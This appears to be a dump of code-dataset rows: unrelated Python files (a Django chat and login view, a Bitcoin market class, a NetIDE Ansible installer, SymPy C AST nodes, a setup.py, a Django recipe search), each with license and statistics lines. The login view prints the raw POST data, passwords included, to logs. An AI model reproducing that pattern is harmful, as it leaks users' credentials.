data = json.loads(request.POST.get('data'))
send_to_user_id = data['to']
local_time = time.strftime("%Y-%m-%d %X",time.localtime(time.time()))
data['timestamp'] = local_time #设置时间戳
print data
if data["contact_type"] == "group":
group_obj = models.User_Group.objects.get(id=send_to_user_id)
for member in group_obj.members.select_related():
print member.id,data["from"]
if str(member.id) not in GLOBAL_MQ:
GLOBAL_MQ[str(member.id)] = Queue.Queue()
if str(member.id) != data["from"]:
GLOBAL_MQ[str(member.id)].put(data)
else:
if send_to_user_id not in GLOBAL_MQ:
GLOBAL_MQ[send_to_user_id] = Queue.Queue()
print "POST",send_to_user_id,data
GLOBAL_MQ[send_to_user_id].put(data)
return HttpResponse(local_time)
# 用户向server 请求数据
if request.method=="GET":
request_user_id = str(request.user.userprofile.id)
msg_lists = []
if request_user_id in GLOBAL_MQ:
stored_msg_nums = GLOBAL_MQ[request_user_id].qsize()
if stored_msg_nums ==0: #no new msgs
try:
msg = GLOBAL_MQ[request_user_id].get(timeout=15)
msg_lists.append(msg)
# msg_lists.append(GLOBAL_MQ[request_user_id].get(timeout=15))
except Exception as e:
print("err:",e)
for i in range(stored_msg_nums):
msg_lists.append(GLOBAL_MQ[request_user_id].get())
else:
GLOBAL_MQ[str(request.user.userprofile.id)] = Queue.Queue()
print "GETMsg",msg_lists
return HttpResponse(json.dumps(msg_lists))
def userLogin(request):
loginFrom = userLoginFrom()
print(request.POST)
err_msg =''
if request.method == "POST":
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(username=username,password=password)
if user is not None:
login(request,user)
return HttpResponseRedirect('/chat/#contacts')
else:
err_msg = "Wrong username or password!"
return render(request,'index.html',{"loginFrom":loginFrom,'err_msg':err_msg})
def userLogout(request):
logout(request)
return HttpResponseRedirect('/')
|
gpl-2.0
| 4,381,744,721,565,426,700 | 30.90991 | 123 | 0.612931 | false | 3.666667 | false | false | false |
taariq/btcmarketdata
|
btcdata/public_markets/market.py
|
1
|
1991
|
import time
import urllib.request
import urllib.error
import urllib.parse
import config
import logging
from fiatconverter import FiatConverter
class Market(object):
def __init__(self, currency):
self.name = self.__class__.__name__
self.currency = currency
self.depth_updated = 0
self.update_rate = 60
self.fc = FiatConverter()
self.fc.update()
def get_depth(self):
timediff = time.time() - self.depth_updated
if timediff > self.update_rate:
self.ask_update_depth()
timediff = time.time() - self.depth_updated
if timediff > config.market_expiration_time:
logging.warn('Market: %s order book is expired' % self.name)
self.depth = {'asks': [{'price': 0, 'amount': 0}], 'bids': [
{'price': 0, 'amount': 0}]}
return self.depth
def convert_to_usd(self):
if self.currency == "USD":
return
for direction in ("asks", "bids"):
for order in self.depth[direction]:
order["price"] = self.fc.convert(order["price"], self.currency, "USD")
def ask_update_depth(self):
try:
self.update_depth()
self.convert_to_usd()
self.depth_updated = time.time()
except (urllib.error.HTTPError, urllib.error.URLError) as e:
logging.error("HTTPError, can't update market: %s - %s" % (self.name, str(e)))
except Exception as e:
logging.error("Can't update market: %s - %s" % (self.name, str(e)))
def get_ticker(self):
depth = self.get_depth()
res = {'ask': 0, 'bid': 0}
if len(depth['asks']) > 0 and len(depth["bids"]) > 0:
res = {'ask': depth['asks'][0],
'bid': depth['bids'][0]}
return res
## Abstract methods
def update_depth(self):
pass
def buy(self, price, amount):
pass
def sell(self, price, amount):
pass
|
mit
| 2,434,534,309,840,194,600 | 30.603175 | 90 | 0.553993 | false | 3.742481 | false | false | false |
fp7-netide/Engine
|
loader/loader/installer.py
|
1
|
8381
|
"""
Copyright (c) 2015, NetIDE Consortium (Create-Net (CN), Telefonica Investigacion Y Desarrollo SA (TID), Fujitsu
Technology Solutions GmbH (FTS), Thales Communications & Security SAS (THALES), Fundacion Imdea Networks (IMDEA),
Universitaet Paderborn (UPB), Intel Research & Innovation Ireland Ltd (IRIIL), Fraunhofer-Institut für
Produktionstechnologie (IPT), Telcaria Ideas SL (TELCA) )
All rights reserved. This program and the accompanying materials
are made available under the terms of the Eclipse Public License v1.0
which accompanies this distribution, and is available at
http://www.eclipse.org/legal/epl-v10.html
Authors:
Gregor Best, [email protected]
"""
import json
import logging
import os
import platform
import requests
import stat
import subprocess as sp
import sys
import tempfile
from subprocess import call
from loader import environment
from loader import util
from loader.package import Package
# XXX make this configurable
install_package_command = "sudo apt-get install --yes {}"
class InstallException(Exception): pass
def do_server_install(pkg):
logging.debug("Doing server install for '{}' now".format(pkg))
prefix = os.path.expanduser("~")
with util.TempDir("netide-server-install") as t:
p = Package(pkg, t)
if not p.load_apps_and_controller():
logging.error("There's something wrong with the package")
return 2
call(["./virtualEnv_Ansible_Install.sh"])
if "server" not in p.config:
raise InstallException('"server" section missing from configuration!')
conf = p.config["server"]
util.editPlaybookServer(conf)
if "host" in conf and platform.node() != conf["host"] and conf["host"] != "localhost":
raise InstallException("Attempted server installation on host {} (!= {})".format(platform.node(), conf["host"]))
# with open("Playbook_Setup/sever.yml", "w") as serverYml:
# serverYml.write("--- \n - name: install prereq for all hosts \n hosts: localhost \n roles: - prereq - core \n ...")
#install core and engine on server (usually localhost)
#read p.config[server] and add server to site.yml
call(["ansibleEnvironment/bin/ansible-playbook", "-v", os.path.join("Playbook_Setup", "siteServer.yml")])
#Check the rest of system requirements
logging.debug("Checking system requirements for {}".format(pkg))
if not p.check_no_hw_sysreq():
logging.error("Requirements for package {} not met".format(pkg))
return 2
def do_client_installs(pkgpath, dataroot):
"Dispatches installation requests to client machines after gaining a foothold on them. Requires passwordless SSH access to \
client machines and passwordless root via sudo on client machines"
with util.TempDir("netide-client-installs") as t:
pkg = Package(pkgpath, t)
if not pkg.load_apps_and_controller():
logging.error("There's something wrong with the package")
return 2
clients = pkg.get_clients()
#controller = pkg.controllers
#print("controller: ")
#print(controller)
#for n in controller:
# print("instance of controller: ")
# print(n)
# for i in controller[n]:
# print(i)
util.editPlaybookClient(pkg)
util.spawn_logged(["ansibleEnvironment/bin/ansible-playbook", "-v", os.path.join("Playbook_Setup", "siteClient.yml")])
#===============================================================================
# util.write_ansible_hosts(clients, os.path.join(t, "ansible-hosts"))
#
# tasks = []
#
# # Can't use `synchronize' here because that doesn't play nice with ssh options
# tasks.append({
# "name": "Copy NetIDE loader",
# "copy": {
# "dest": '{{ansible_user_dir}}/netide-loader-tmp',
# "src" : os.getcwd()}})
#
# # We need to do this dance because `copy' copies to a subdir unless
# # `src' ends with a '/', in which case it doesn't work at all (tries
# # to write to '/' instead)
# tasks.append({
# "shell": "mv {{ansible_user_dir}}/netide-loader-tmp/loader {{ansible_user_dir}}/netide-loader",
# "args": {"creates": "{{ansible_user_dir}}/netide-loader"}})
# tasks.append({"file": {"path": "{{ansible_user_dir}}/netide-loader-tmp", "state": "absent"}})
# tasks.append({"file": {"path": "{{ansible_user_dir}}/netide-loader/netideloader.py", "mode": "ugo+rx"}})
#
# tasks.append({
# "name": "Bootstrap NetIDE loader",
# "shell": "bash ./setup.sh",
# "args": { "chdir": "{{ansible_user_dir}}/netide-loader" }})
#
# #is already cloned...
# tasks.append({
# "name": "Clone IDE repository",
# "git": {
# "repo": "http://github.com/fp7-netide/IDE.git",
# "dest": "{{ansible_user_dir}}/IDE",
# "version": "development"}})
#
# #has been done in setup server
# tasks.append({
# "name": "Install Engine",
# "shell": "bash {{ansible_user_dir}}/IDE/plugins/eu.netide.configuration.launcher/scripts/install_engine.sh"})
# #add creates:
# tasks.append({
# "file": {
# "path": dataroot,
# "state": "directory"}})
#
# tasks.append({
# "name": "Register Package checksum",
# "copy": {
# "content": json.dumps({"cksum": pkg.cksum}, indent=2),
# "dest": os.path.join(dataroot, "controllers.json")}})
#
# playbook = [{"hosts": "clients", "tasks": tasks}]
#
# #use new role system here !
# for c in clients:
#
# ctasks = []
#
# apps = []
# # Collect controllers per client machine and collect applications
# for con in pkg.controllers_for_node(c[0]):
# apps.extend(con.applications)
# cname = con.__name__.lower()
# if cname not in ["ryu", "floodlight", "odl", "pox", "pyretic"]:
# raise InstallException("Don't know how to install controller {}".format(cname))
#
# script = ["{{ansible_user_dir}}", "IDE", "plugins", "eu.netide.configuration.launcher", "scripts"]
# script.append("install_{}.sh".format(cname))
#
# ctasks.append({
# "name": "install controller {}".format(cname),
# "shell": "bash {}".format(os.path.join(*script)),
# "args": {"chdir": "{{ansible_user_dir}}"}})
#
# # Install application dependencies
# # XXX: ugly :/
# # XXX: libraries
# for a in apps:
# reqs = a.metadata.get("requirements", {}).get("Software", {})
#
# # Languages
# for l in reqs.get("Languages", {}):
# if l["name"] == "python":
# if l["version"].startswith("3"):
# l["name"] += "3"
# else:
# l["name"] += "2"
# elif l["name"] == "java":
# if "7" in l["version"]:
# l["name"] = "openjdk-7-jdk"
# elif "8" in l["version"]:
# l["name"] = "openjdk-8-jdk"
# else:
# l["name"] = "openjdk-6-jdk"
#
# ctasks.append({
# "name": "install {} (for app {})".format(l["name"], str(a)),
# "apt": {"pkg": "{}={}*".format(l["name"], l["version"])}})
# playbook.append({"hosts": c[0], "tasks": ctasks})
#
# # A valid JSON-document is also valid YAML, so we can take a small shortcut here
# with open(os.path.join(t, "a-playbook.yml"), "w") as ah:
# json.dump(playbook, ah, indent=2)
# print(playbook)
# util.spawn_logged(["ansibleEnvironment/bin/ansible-playbook", "-v", "-i", os.path.join(t, "ansible-hosts"), os.path.join(t, "a-playbook.yml")])
#===============================================================================
|
epl-1.0
| -2,557,839,773,706,332,700 | 41.323232 | 153 | 0.540692 | false | 3.703049 | true | false | false |
wxgeo/geophar
|
wxgeometrie/sympy/codegen/cnodes.py
|
3
|
2498
|
"""
AST nodes specific to the C family of languages
"""
from sympy.core.basic import Basic
from sympy.core.compatibility import string_types
from sympy.core.containers import Tuple
from sympy.core.sympify import sympify
from sympy.codegen.ast import Attribute, Declaration, Node, String, Token, Type, none, FunctionCall
void = Type('void')
restrict = Attribute('restrict') # guarantees no pointer aliasing
volatile = Attribute('volatile')
static = Attribute('static')
def alignof(arg):
""" Generate of FunctionCall instance for calling 'alignof' """
return FunctionCall('alignof', [String(arg) if isinstance(arg, string_types) else arg])
def sizeof(arg):
""" Generate of FunctionCall instance for calling 'sizeof'
Examples
========
>>> from sympy.codegen.ast import real
>>> from sympy.codegen.cnodes import sizeof
>>> from sympy.printing.ccode import ccode
>>> ccode(sizeof(real))
'sizeof(double)'
"""
return FunctionCall('sizeof', [String(arg) if isinstance(arg, string_types) else arg])
class CommaOperator(Basic):
""" Represents the comma operator in C """
def __new__(cls, *args):
return Basic.__new__(cls, *[sympify(arg) for arg in args])
class Label(String):
""" Label for use with e.g. goto statement.
Examples
========
>>> from sympy.codegen.cnodes import Label
>>> from sympy.printing.ccode import ccode
>>> print(ccode(Label('foo')))
foo:
"""
class goto(Token):
""" Represents goto in C """
__slots__ = ['label']
_construct_label = Label
class PreDecrement(Basic):
""" Represents the pre-decrement operator
Examples
========
>>> from sympy.abc import x
>>> from sympy.codegen.cnodes import PreDecrement
>>> from sympy.printing.ccode import ccode
>>> ccode(PreDecrement(x))
'--(x)'
"""
nargs = 1
class PostDecrement(Basic):
""" Represents the post-decrement operator """
nargs = 1
class PreIncrement(Basic):
""" Represents the pre-increment operator """
nargs = 1
class PostIncrement(Basic):
""" Represents the post-increment operator """
nargs = 1
class struct(Node):
""" Represents a struct in C """
__slots__ = ['name', 'declarations']
defaults = {'name': none}
_construct_name = String
@classmethod
def _construct_declarations(cls, args):
return Tuple(*[Declaration(arg) for arg in args])
class union(struct):
""" Represents a union in C """
|
gpl-2.0
| 1,761,598,395,251,997,700 | 22.566038 | 99 | 0.651321 | false | 3.915361 | false | false | false |
ezietsman/seismo
|
setup.py
|
1
|
1041
|
from numpy.distutils.core import Extension
f90periodogram = Extension(name='f90periodogram',
sources=['seismo/src/periodogram.f90'],
extra_f90_compile_args=["-fopenmp", "-lgomp"],
extra_link_args=["-lgomp"])
if __name__ == "__main__":
from numpy.distutils.core import setup
setup(name='seismo_blobs',
description="Compiled sources for use with seismo",
author="Ewald Zietsman",
author_email="[email protected]",
ext_modules=[f90periodogram]
)
# Now seismo
import setuptools
setuptools.setup(
name="seismo",
version="0.2",
packages=setuptools.find_packages(),
install_requires=['numpy>=1.9'],
# metadata for upload to PyPI
author="Ewald Zietsman",
author_email="[email protected]",
description="Timeseries stuff for asteroseismology",
license="MIT",
keywords="time series frequency",
)
|
mit
| 5,087,803,322,496,857,000 | 29.617647 | 73 | 0.580211 | false | 3.898876 | false | false | false |
Anushi/inhousemenu
|
search_recipes/views.py
|
1
|
14147
|
import operator
from django.shortcuts import render
from django.http import HttpResponse
from .models import RecipeList, RecipeIngredient, RecipeContent2, IngredientList
from django.db.models import Q
import itertools
# Create your views here.
def search_recipes_form(request):
ingredients_name_list = IngredientList.objects.all()
#print ingredients_name_list
for i in ingredients_name_list:
print i.ingredient_name
return render(request, 'search_form.html',
{'ingredients_name_list': ingredients_name_list
})
def search_recipes(request):
search_list = []
search_list_temp = []
checks_list = []
split_q_nonull = []
split_q_nonull2 = []
delete_list = []
other_list = []
q2=""
ingredients_name_list = IngredientList.objects.all()
if request.method == 'GET':
if request.GET.getlist('checks[]'):
checks_list = request.GET.getlist('checks[]')
search_list_temp.extend(checks_list)
if request.GET.getlist('other'):
other_list = request.GET.getlist('other')
search_list_temp.extend(other_list)
print "====== other_list ======"
print other_list
if request.GET.getlist('add'):
add_list = request.GET.getlist('add')
search_list_temp.extend(add_list)
print "====== add_list ======"
print add_list
"""if 'q' in request.GET:
q = request.GET['q']
q_encode=q.encode('utf8')
split_q = q_encode.split(",")
split_q_nonull = [x for x in split_q if x]
search_list_temp.extend(split_q_nonull)
print "====== Q ======"
print q"""
if 'q2' in request.GET:
q2 = request.GET['q2']
q_encode2=q2.encode('utf8')
split_q2 = q_encode2.split(",")
split_q_nonull2 = [x for x in split_q2 if x]
search_list_temp.extend(split_q_nonull2)
print "**** Q2 ****"
print q2
if 'delete' in request.GET:
delete_list = request.GET.getlist('delete')
print "-- DEL LIST --"
print delete_list
#for d in delete_list:
# search_list.remove(d)
for s in search_list_temp:
search_list.append(s.lower())
print "-- search_list -- "
print search_list
recipe_ingredients_table = RecipeIngredient.objects.filter(reduce(lambda x, y: x | y, [Q(ingredient__contains=word) for word in search_list]))
recipe_list = []
for r in recipe_ingredients_table:
recipe_list.append(r.recipe_name)
recipe_list_unique = list(set(recipe_list))
recipe_name_table = RecipeList.objects.filter(reduce(lambda x, y: x | y, [Q(recipe_name__iexact=word) for word in recipe_list_unique]))
######### RANKING RECIPES ######################
recipe_content = RecipeContent2.objects.filter(reduce(lambda x, y: x | y, [Q(recipe_name__iexact=word) for word in recipe_list_unique]))
search_set = set(search_list)
print " == SEARCH SET =="
print search_set
s_len = len(search_set)
rank_dic = {}
#for i in xrange(s_len, 0, -1):
for i in range(1, s_len+1):
subsets = set(itertools.combinations(search_set, i))
for x in subsets:
recipe_content_rankwise = recipe_content.filter(reduce(lambda x, y: x | y, [Q(content__contains=word) for word in x]))
qs = recipe_content.filter(reduce(operator.and_, (Q(content__contains=word) for word in x)))
for temp in qs:
rank_dic[temp.recipe_name] = i
#print "--- RANK DICTIONARY --"
sorted_rank_dic = sorted(rank_dic.items(), key=operator.itemgetter(1), reverse=True)
#print sorted_rank_dic
######### END RANKING RECIPES ######################
##########################################################
# Meal type - main, entree, soups, desserts, congee, etc
recipe_name_mealtype_table = []
meal_type = []
meal_type_list = []
if request.GET.getlist('meal_type'):
meal_type = request.GET.getlist('meal_type')
if meal_type[0] == "Desserts":
meal_type_list.append("dessert")
elif meal_type[0] == "Soups":
meal_type_list.append("soup")
elif meal_type[0] == "Congee":
meal_type_list.append("congee")
elif meal_type[0] == "Entree + Main":
meal_type_list.append("entree")
meal_type_list.append("main")
elif meal_type[0] == "All":
meal_type_list.append("entree")
meal_type_list.append("soup")
meal_type_list.append("congee")
meal_type_list.append("main")
meal_type_list.append("dessert")
meal_type_list.append("")
#recipe_name_mealtype_table = recipe_name_table.filter(reduce(lambda x, y: x | y, [Q(category__iexact=word) for word in meal_type_list]))
else:
meal_type_list.append("entree")
meal_type_list.append("soup")
meal_type_list.append("congee")
meal_type_list.append("main")
meal_type_list.append("dessert")
meal_type_list.append("")
recipe_name_mealtype_table = recipe_name_table.filter(reduce(lambda x, y: x | y, [Q(category__iexact=word) for word in meal_type_list]))
##########################################################
# Cuisine type - Australian, Chinese, Indian, etc
recipe_name_cuisinetype_table = []
cuisine_type = []
cuisine_type_list = []
if request.GET.getlist('cuisine_type'):
cuisine_type = request.GET.getlist('cuisine_type')
if cuisine_type[0] == "Australian":
cuisine_type_list.append("Australian")
elif cuisine_type[0] == "Chinese":
cuisine_type_list.append("Chinese")
elif cuisine_type[0] == "Indian":
cuisine_type_list.append("Indian")
elif cuisine_type[0] == "All":
cuisine_type_list.append("Australian")
cuisine_type_list.append("Chinese")
cuisine_type_list.append("Indian")
#recipe_name_cuisinetype_table = recipe_name_mealtype_table.filter(reduce(lambda x, y: x | y, [Q(recipe_type__iexact=word) for word in cuisine_type_list]))
else:
cuisine_type_list.append("Australian")
cuisine_type_list.append("Chinese")
cuisine_type_list.append("Indian")
recipe_name_cuisinetype_table = recipe_name_mealtype_table.filter(reduce(lambda x, y: x | y, [Q(recipe_type__iexact=word) for word in cuisine_type_list]))
# Flavour type - Mixed, Spicy & Flavor, Thick & Creamy etc
recipe_name_tastetype_table = []
taste_type = []
taste_type_list = []
if request.GET.getlist('taste[]'):
taste_type = request.GET.getlist('taste[]')
print "*********"
print taste_type
if "spicy&hot" in taste_type:
taste_type_list.append("spicy&hot")
elif "thick&creamy" in taste_type:
taste_type_list.append("thick&creamy")
elif "light&refresh" in taste_type:
taste_type_list.append("light&refresh")
elif "crispy&crunchy" in taste_type:
taste_type_list.append("crispy&crunchy")
elif "mixed" in taste_type:
taste_type_list.append("spicy&hot")
taste_type_list.append("thick&creamy")
taste_type_list.append("light&refresh")
taste_type_list.append("")
recipe_name_tastetype_table = recipe_name_cuisinetype_table.filter(reduce(lambda x, y: x | y, [Q(taste__iexact=word) for word in taste_type_list]))
#CATEGORY
main_recipes_table = recipe_name_tastetype_table.filter(category__iexact="main")
entree_recipes_table = recipe_name_tastetype_table.filter(category__iexact="entree")
dessert_recipes_table = recipe_name_tastetype_table.filter(category__iexact="dessert")
soup_recipes_table = recipe_name_tastetype_table.filter(category__iexact="soup")
congee_recipes_table = recipe_name_tastetype_table.filter(category__iexact="congee")
main_rank_dictionary = {}
for m in main_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
main_rank_dictionary[recp] = rank_dic[recp]
sorted_main_rank_dic = sorted(main_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
entree_rank_dictionary = {}
for m in entree_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
entree_rank_dictionary[recp] = rank_dic[recp]
sorted_entree_rank_dic = sorted(entree_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
dessert_rank_dictionary = {}
for m in dessert_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
dessert_rank_dictionary[recp] = rank_dic[recp]
sorted_dessert_rank_dic = sorted(dessert_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
soup_rank_dictionary = {}
for m in soup_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
soup_rank_dictionary[recp] = rank_dic[recp]
sorted_soup_rank_dic = sorted(soup_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
congee_rank_dictionary = {}
for m in congee_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
congee_rank_dictionary[recp] = rank_dic[recp]
sorted_congee_rank_dic = sorted(congee_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
return render(request, 'search_results.html',
{'ingredients_name_list': ingredients_name_list,
'checks_list': checks_list,
'recipe_name_table': recipe_name_table,
'recipe_name_tastetype_table': recipe_name_tastetype_table,
'meal_type': meal_type,
'cuisine_type': cuisine_type,
'taste_type': taste_type,
'q2': q2,
'search_set':search_set,
'delete_list':delete_list,
'other_list':other_list,
'sorted_main_rank_dic':sorted_main_rank_dic,
'sorted_entree_rank_dic':sorted_entree_rank_dic,
'sorted_dessert_rank_dic':sorted_dessert_rank_dic,
'sorted_soup_rank_dic':sorted_soup_rank_dic,
'sorted_congee_rank_dic':sorted_congee_rank_dic
})
#message = 'Hello Anushi'
#return HttpResponse(message)
def search_recipes_copy(request):
#if 'q' in request.GET:
# message = 'You searched for: %r' % request.GET['q']
#else:
# message = 'You submitted an empty form.'
#return HttpResponse(message)
request_temp = request
message = "Hello"
if request.method == 'GET':
message = 'Welcome'
search_list = []
taste_search_list = []
checks_list = []
if request.GET.getlist('checks[]'):
checks_list = request.GET.getlist('checks[]')
search_list.extend(checks_list)
print "#############################"
print checks_list
if request.GET['q']:
q = request.GET['q']
q_encode=q.encode('utf8')
split_q = q_encode.split(",")
split_q_nonull = [x for x in split_q if x]
search_list.extend(split_q_nonull)
if request.GET.getlist('taste[]'):
print "**** TASTE *****"
taste_list = request.GET.getlist('taste[]')
taste_search_list.extend(taste_list)
if "" in taste_search_list:
if 'spicy&hot' not in taste_search_list:
taste_search_list.append('spicy&hot')
if 'thick&creamy' not in taste_search_list:
taste_search_list.append('thick&creamy')
if 'light&refresh' not in taste_search_list:
taste_search_list.append('light&refresh')
if 'crispy&crunchy' not in taste_search_list:
taste_search_list.append('crispy&crunchy')
print taste_search_list
print "---------------------------"
recipe_ingredients_table = RecipeIngredient.objects.filter(reduce(lambda x, y: x | y, [Q(ingredient__contains=word) for word in search_list]))
recipe_list = []
for r in recipe_ingredients_table:
recipe_list.append(r.recipe_name)
recipe_list_unique = list(set(recipe_list))
recipe_name_table = RecipeList.objects.filter(reduce(lambda x, y: x | y, [Q(recipe_name__iexact=word) for word in recipe_list_unique]))
#TASTE
recipe_name_taste_table = recipe_name_table.filter(reduce(lambda x, y: x | y, [Q(taste__iexact=word) for word in taste_search_list]))
#CATEGORY
main_recipes_table = recipe_name_taste_table.filter(category__iexact="main")
entree_recipes_table = recipe_name_taste_table.filter(category__iexact="entree")
return render(request, 'search_results.html',
{'main_recipes_table': main_recipes_table, 'entree_recipes_table': entree_recipes_table,'query': search_list, 'request_temp': request_temp, 'checks_list': checks_list})
def get_full_recipe(request,recipe_name_arg):
recipe_name_list = RecipeList.objects.filter(recipe_name=recipe_name_arg)
recipe_ingredients_list = RecipeIngredient.objects.filter(recipe_name=recipe_name_arg)
recipe_content = RecipeContent2.objects.filter(recipe_name=recipe_name_arg)
#html = "<html><body>Recipe is : %s </body></html>" % recipe_name
#return HttpResponse(html)
return render(request, 'get_full_recipe.html', {'recipe_name_list': recipe_name_list,'recipe_ingredients_list' : recipe_ingredients_list, 'recipe_content': recipe_content})
|
mit
| -8,943,540,473,010,711,000 | 35.37018 | 180 | 0.581466 | false | 3.417975 | false | false | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.